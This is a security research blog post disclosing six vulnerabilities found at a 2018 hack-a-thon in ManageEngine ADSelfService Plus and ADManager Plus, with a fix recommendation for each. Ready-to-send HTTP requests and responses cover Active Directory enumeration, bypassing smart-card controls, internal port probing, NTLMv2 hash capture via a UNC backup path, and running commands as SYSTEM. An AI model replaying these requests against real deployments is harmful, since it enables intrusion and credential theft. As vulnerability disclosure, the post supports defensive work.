Wednesday, May 2, 2018

First 0DAY ALL DAY Event Findings

The first 0DAYALLDAY event was held on April 7th, 2018 from 11am to Midnight.  It was organized by Spectant Security and the Blackmarble group (blackmarble.sh):

https://spectant.io
https://blackmarble.sh/0-day-all-day/

0DAYALLDAY is a quarterly REAL "Hack-A-Thon" where security researchers from the DFW Metroplex come together to hunt for bugs in supplied software.

The first event was invitation only to work out the kinks and observe the feasibility and logistics of future events. You can find more information directly at the 0DAYALLDAY website: https://www.0dayallday.org/

The main software Spectant targeted was the Manage Engine AD Self Service Plus installation and the Manage Engine AD Manager Plus installation. The following table lists the issues found along with their risk scores:

Software Finding Risk Rating
ADSelfService Plus Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration High
ADSelfService Plus ANY User Can remove and enable/disable smart cards for other users High
ADSelfService Plus Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration Medium
ADSelfService Plus Authenticated Host and Port Enumeration Medium
ADSelfService Plus Admin DBBackup Remote Host Enumeration and SMB Capture Informational
ADManager Plus Application Admin can Run Commands as SYSTEM via User Modification Scripts Informational

The following section describes the technical details for each finding.

Detailed Findings

Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration

Software Finding Risk Rating
ADSelfService Plus Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration High

The default installation of Manage Engine's ADSelf Service Plus application allows anyone to search for employees or view an organizational chart.  By sending the following unauthenticated request an attacker can enumerate the entire domain:


GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/authorization.do
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


This chart on the surface shows various information about the user and the domain that user is associated with:

However, by viewing the returned HTML source code for the OrganizationChart.cc request much more detailed information is available about the underlying AD structure:


<div style="padding:3px 5px;" id="CN=Administrator,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=Guest,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=DefaultAccount,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...


Not only can a potential attacker obtain usernames, emails, phone numbers, and potential user photos of victims, they can also obtain what AD Domains they are apart of as well as what OU's they are in. Since the Organzation Chart displays a list of ALL users within the AD it is also possible for a potential attacker to determine what software is installed across the organization by observing which user system and service accounts are present. All of this can be combined to build and execute a very convicing social engineering attack.

Recommendation:

As a work around it is recommended that "Employee Search" be disabled from the Configuration options with ADSelfService Plus. However, Manage Engine should really but this search feature behind the authentication portal in the default install.

ANY User Can remove and enable/disable smart cards for other users

Software Finding Risk Rating
ADSelfService Plus ANY User Can remove and enable/disable smart cards for other users High

While doing cross account access testing it was discovered that the /WC/SmartCard.do application endpoint allowed even the lowest privileged user the ability to enable and disable any smart card configured in the system by directly interfacing with the endpoint. This is done by sending the following request:


POST /WC/SmartCard.do?mTCall=enableDisableSmartCard HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 79
Cookie: JSESSIONIDADSSP=00B684925C94F202DBF9139805493DD5; JSESSIONID=08C2A68C1BBF9E4E46ABE59844D3BBA3; NTLM_LOGGED_OUT=true; adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0; JSESSIONIDSSO=EBF4FB52BC685DC4A2FF9639FAF75D83
DNT: 1
Connection: close

IS_ENABLED=false&SMARTCARD_ID=1&URL=&adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0


The request above will cause the application to either enable or disable the smart card referenced with the SMARTCARD_ID parameter:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 132
Date: Wed, 11 Apr 2018 11:21:52 GMT
Connection: close

{"sSTATUS":"ads.admin.logon_settings.smartcard_settings.enable_disable_success","SMARTCARD_NEEDS_RESTART":false,"IS_ENABLED":false}


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to enable or disable smart card authentication requirements.

Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration

Software Finding Risk Rating
ADSelfService Plus Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration Medium

During testing it was also noted that even if the "Employee Search" option and OrganizationChart.cc endpoint were disabled it was still possible for the lowest privilege users to access full User, Group, Domain, and Computer/System lists from the /ADSPopupAction.do application endpoint.

This endpoint contains a method called getDataModelUIDesign that expects a JSON parameter string in a POST request. Within the JSON parameter you can specify an objectTypeId to enumerate the Users, Groups, Domains, and Computer/Systems. This is evident by sending the following request with objectTypeId: 2


POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/RestrictUsers.do?methodToCall=generate&action=staleAccountPage&init=true&selectedTab=admin&selectedTile=RestrictUsersSettings&domains=DC=blackmarble,DC=sh&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 261
Cookie: JSESSIONIDADSSP=CF41E5FBF4EE234934E3C64D4211352E; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=C77D3B15E0F4DB4A094B7303DF810027; adscsrf=969db194-807f-48d8-b8ff-63668b69b927;
DNT: 1
Connection: close

params={"popupId":5,"objectTypeId":2,"viewModelId":11,"domainName":"blackmarble.sh","allDomains":false,"isForestDomainsOnly":false,"colFilter":{},"popupDataModelId":11,"searchText":"","start":1,"end":100,"range":100}&adscsrf=969db194-807f-48d8-b8ff-63668b69b927


The above request will return a list of Users and their corresponding domain:



By changing the objectTypeId to 4 in the following request it is possible to see a full list of systems associated with the AD Domain including which systems are the designated Domain Controllers:


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access any potentially sensitive objectTypeIds.

Authenticated Host and Port Enumeration

Software Finding Risk Rating
ADSelfService Plus Authenticated Host and Port Enumeration Medium

One of the more interesting endpoints discovered during testing was the /JumpToAction.do application endpoint. This endpoint contains a method called testConnection that expects a parameter called URL. If you supply a IP/URL and PORT combination the application attempts to connect to the supplied URL and PORT and returns success or failure depending on status of the connection:


POST /JumpToAction.do?mTCall=testConnection HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 73
Cookie: JSESSIONIDADSSP=2C1D14504E2E15CB00C7BD5F14D6BE17; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; adscsrf=7094a261-8a15-4492-ac0c-75b35a539700; JSESSIONIDSSO=8057D2014941CAC8031120C1E346B3C1
DNT: 1
Connection: close

URL=http://[REDACTED]:22/&adscsrf=7094a261-8a15-4492-ac0c-75b35a539700


The connection above will cause the system to check if PORT 22 is open on HOST [REDACTED]. Since this port is open it will return "success":


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 9
Date: Wed, 11 Apr 2018 12:24:07 GMT
Connection: close

success


Combining this with the ADSPOPUP vulnerability allows the attacker to potentially finger print the entire network based on open ports and software installed.

Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access the testConnection method of the JumpToAction.do application endpoint.

Admin DBBackup Remote Host Enumeration and SMB Capture

Software Finding Risk Rating
ADSelfService Plus Admin DBBackup Remote Host Enumeration and SMB Capture Informational

While testing the application it was noted that the admin account for the ADSelfService Plus application could execute database backups. This account could specify the local system path used for storing the database backups. The application does not validate that the path supplied by the admin is a valid local system path and will attempt to access any path supplied.

Using this knowledge, it is possible for an attacker with admin privileges to supply a remote UNC path for the database backup to be stored. This causes the system to attempt to authenticate with the remote, attacker supplied, system. During this attempted authentication the NTLMv2 has can be retrieved:


[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\MANAGEENGINE-01$
[SMB] NTLMv2-SSP Hash : MANAGEENGINE-01$::BLACKMARBLE:1122334455667788:57AB85[...SNIP...]380032002E8000000000000000000
[SMB] Requested Share : \\[REDACTED]\IPC$

[SMB] Requested Share : \\[REDACTED]\TEST2
[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::BLACKMARBLE:1122334455667788:D7446276CF[...SNIP...]3100330038000000000000000000


Recommendation:

It is recommended that the application verify that the administrator is only supplying local system paths.

Application Admin can Run Commands as SYSTEM via User Modification Scripts

Software Finding Risk Rating
ADManager Plus Application Admin can Run Commands as SYSTEM via User Modification Scripts Informational

It was noted during testing that there is a section of the user modification where the admin can supply a custom script that executes immediately. By sending the following requset:


POST /ExecuteForm.do?methodToCall=submitExecuteLayout&templateCategoryId=6&isWorkFlowMode=false HTTP/1.1
Host: 127.0.0.1:7778
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7778/ExecuteForm.do?methodToCall=init&operation=singleModify&templateCategoryId=6&guid={E034A7E7-0ED8-4761-82A0-C92E3304F943}&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 146672
Cookie: JSESSIONIDADSSP=973B256F550EEAF12D8858EC8C3D1601; JSESSIONID=70D75AB6A980017519AE98671F18838A; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=DC158F7DF0B24F4DC0A4884CAD8C74CD; adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1; CUSTOM_SSO_TICKET=1523459129211; CUSTOM_SSO_APP_NAME="ManageEngine ADManager Plus"; CUSTOM_SSO_APP_TAG_NAME=ADMP; APPS_PANE_LOADED=true
DNT: 1
Connection: close

FcExecuteLayout= ...[SNIP]...
{"tabId":"32","tabName":"Custom%20Attributes","layoutId":"8","tabSeq":"7","isO365Tab":"false","description":"description","isHidden":"false","FcRhsLayoutSubTabGroup":[{"tabId":"32","subTabGroupId":"32","subTabGroupName":"Custom%20Attributes","isOptionTab":"false","isCustomTab":"true","optionTabType":"","FcRhsLayoutSubTab":[{"subTabId":"37","subTabGroupId":"32","subTabName":"Custom%20Attributes","subTabType":"","isDefaultSelectedSubTab":"false","isHidden":"true","lhsSubTabId":"18","fieldGroupsStatusMsg":"No%20Field%20Groups%20are%20available.","FcRhsLayoutFieldGroup":[{"fieldGroupId":"55","subTabId":"37","fieldGroupName":"Custom%20Attributes","description":"Description","fieldGroupSeq":"1","isSingleColumn":"false","isHidden":"false","FcRhsLayoutField":[{"ComponentVals":{"scriptEnabled":true,"scriptCommand":"whoami","ignoreWarning":true},"AvoidDuplicationDetails":{"duplicationLevel":"","isApplyNamingFormat":"false","stopExecution":"false","isAppendingNumber":"true","isAppendCharsSpecified":"false","appendStartIndex":"2","suffixLength":"2","fillingChars":"0","formatId":"-1"},"layoutFieldId":"245","fieldGroupId":"55","fieldId":"2616","componentId":"57","attribSeq":"1","isHidden":"false","position":"RHS","attribDisplayText":"Custom%20Script","defaultValue":"","isMandatory":"false","isReadOnly":"false","isEnabledForBulkEdit":"false","isAvoidDuplication":"false","isImmdeiateDuplicationCheck":"false","isCustomField":"false","minLen":"2","maxLen":"255","systemRestrictedLength":"255","helpText":"","isDomainSpecificField":"false","domainSpecificDataProviderClassName":"","validationIds":"","isAvailableInTemplate":"true","isRestricted":"false","isAuthorized":"true","isComponentLevelAuthorized":"false","iamAppId":"1","parentFieldId":"0","childFieldArr":[]}]}]}]}]}]}&templateId=8&isCopiedObject=false&isDirectCopyObject=false&isOverWriteADValue=true&adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1


This request (redacted for length) causes the application to immediately execute the "whoami" command and respond with the output of that command:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
expires: 1970-01-01 05:30:00
pragma: no-cache
cache-control: no-cache, no-store
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Date: Wed, 11 Apr 2018 15:07:25 GMT
Connection: close
Content-Length: 197494


...[SNIP]...

</table></td> <td width="10%" valign="top" align="right"><a class="linkblacktxt" href="javascript:hideStatusTable();"><img src="images/delete.gif" width="9" height="9" border="0"> Close</a><td></tr> <tr><td colspan="2" align="center"><span align="center" class="blacktxt">Custom script result: nt authority\system </span></span></td></tr></table></td> <td background="images/blue/gray_right_bgline.gif"><img src="images/blue/gray_right_bgline.gif" width="6" height="1"></td></tr><tr><td width="6" height="6" valign="top"><img src="images/blue/gray_botleft_curve.gif" width="6" height="6"></td> <td height="6" background="images/blue/gray_bot_bgline.gif"><img src="images/blue/gray_bot_bgline.gif" width="1" height="6"></td> <td width="6" height="6" valign="top"><img src="images/blue/gray_botright_curve.gif" width="6" height="6"></td></tr></table></td></tr></table><br></div>

Recommendation:

Since this is purely an informational finding and only noted to help anyone who may stumble upon an admin account for this application during a penetration test, there is no real recommendation. However, it should be noted that there should be the ability to disable this functionality and/or use a different system level account during installation to prevent potential system compromise.